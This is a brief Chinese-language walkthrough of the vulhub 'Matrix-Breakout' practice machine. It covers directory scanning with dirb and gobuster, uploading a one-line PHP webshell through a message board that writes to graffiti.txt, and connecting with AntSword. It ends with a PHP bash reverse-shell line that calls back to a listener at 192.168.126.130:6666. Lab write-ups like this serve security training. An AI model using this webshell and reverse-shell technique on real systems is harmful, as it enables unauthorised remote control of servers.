vulhub Matrix-Breakout
1.下载靶机,打开靶机和kali虚拟机

2.查询kali和靶机ip

3.浏览器访问

访问81端口有登陆界面

4.扫描敏感目录
kali dirb 扫描

一一访问

robot.txt提示我们继续找找,可能是因为我们的字典太小了,我们换个扫描器换个字典试下,利用kali自带的最大的一个字典。
gobuster dir -u http://192.168.126.175 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

5.一一访问,发现留言板功能

6.漏洞挖掘
在其中进行上传抓包查看

发现上传到了graffiti.txt内,尝试上传一句话木马

7.获取webshell
蚁剑连接

8.上传反弹shell的php文件
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.126.130/6666 0>&1'");?>
浏览器访问shell.php
kali nc监听

